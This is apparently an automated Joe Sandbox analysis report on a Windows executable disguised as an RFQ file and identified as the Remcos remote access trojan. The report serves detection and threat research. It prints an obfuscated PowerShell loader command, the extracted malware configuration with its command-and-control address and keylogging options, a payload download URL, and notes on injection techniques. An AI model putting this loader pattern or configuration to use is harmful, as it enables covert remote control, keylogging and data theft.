Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INTECH RFQ EN241813.exe

Overview

General Information

Sample name:INTECH RFQ EN241813.exe
Analysis ID:1566703
MD5:f9848165fbabe0f8b34fb5d830b2fecc
SHA1:2c53840921153910eb84270e4e12d07e82b1451d
SHA256:a19b171658151c4a4af32dd17474a8184cc37a0d99138ae540177e15cebd9093
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • INTECH RFQ EN241813.exe (PID: 4576 cmdline: "C:\Users\user\Desktop\INTECH RFQ EN241813.exe" MD5: F9848165FBABE0F8B34FB5D830B2FECC)
    • powershell.exe (PID: 2728 cmdline: "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5772 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5328 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5204 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5876 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5924 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6392 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5292 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 3320 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5948 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2276 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 1088 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2036 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5588 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5608 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 3428 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 948 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5728 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2784 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6008 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6244 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 340 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6944 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 7100 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 7028 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 7000 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5024 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6864 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6084 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5840 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6044 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 3040 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 4872 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 3384 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 1584 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["69.61.31.229:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EPE0FD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.3373300576.000000002495F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Process Memory Space: msiexec.exe PID: 5772JoeSecurity_RemcosYara detected Remcos RATJoe Security

              System Summary

              barindex
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.168.7.16, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5772, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49846
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)", CommandLine: "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INTECH RFQ EN241813.exe", ParentImage: C:\Users\user\Desktop\INTECH RFQ EN241813.exe, ParentProcessId: 4576, ParentProcessName: INTECH RFQ EN241813.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)", ProcessId: 2728, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 5772, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T15:49:08.164394+010020365941Malware Command and Control Activity Detected192.168.2.64985369.61.31.2292404TCP
              2024-12-02T15:49:10.336366+010020365941Malware Command and Control Activity Detected192.168.2.64985969.61.31.2292404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T15:49:10.660518+010028033043Unknown Traffic192.168.2.649861178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T15:49:04.894012+010028032702Potentially Bad Traffic192.168.2.649846104.168.7.1680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["69.61.31.229:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EPE0FD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Yara matchFile source: 00000007.00000002.3373300576.000000002495F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5772, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: INTECH RFQ EN241813.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_00405FE4 FindFirstFileA,FindClose,0_2_00405FE4
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055A0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49859 -> 69.61.31.229:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49853 -> 69.61.31.229:2404
              Source: Malware configuration extractorIPs: 69.61.31.229
              Source: global trafficTCP traffic: 192.168.2.6:49853 -> 69.61.31.229:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: GLOBALCOMPASSUS GLOBALCOMPASSUS
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49846 -> 104.168.7.16:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49861 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /wvINIwTIDedSXoITN141.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 104.168.7.16Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.16
              Source: global trafficHTTP traffic detected: GET /wvINIwTIDedSXoITN141.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 104.168.7.16Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3372869237.0000000024140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.16/wvINIwTIDedSXoITN141.bin
              Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp9
              Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpF~
              Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
              Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpkL
              Source: msiexec.exe, 00000007.00000003.2853394305.0000000008EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
              Source: INTECH RFQ EN241813.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: INTECH RFQ EN241813.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_00405109 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405109

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000007.00000002.3373300576.000000002495F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5772, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: msiexec.exeProcess created: 66

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: INTECH RFQ EN241813.exe
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_00403219 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403219
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_004049480_2_00404948
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_004062BA0_2_004062BA
              Source: INTECH RFQ EN241813.exe, 00000000.00000000.2089778793.000000000043C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrnefdslerne.exeF vs INTECH RFQ EN241813.exe
              Source: INTECH RFQ EN241813.exeBinary or memory string: OriginalFilenamebrnefdslerne.exeF vs INTECH RFQ EN241813.exe
              Source: INTECH RFQ EN241813.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4562/12@1/3
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_0040440C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040440C
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeFile created: C:\Users\user\AppData\Roaming\MirrorJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-EPE0FD
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeFile created: C:\Users\user\AppData\Local\Temp\nsdCEC5.tmpJump to behavior
              Source: INTECH RFQ EN241813.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeFile read: C:\Users\user\Desktop\INTECH RFQ EN241813.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\INTECH RFQ EN241813.exe "C:\Users\user\Desktop\INTECH RFQ EN241813.exe"
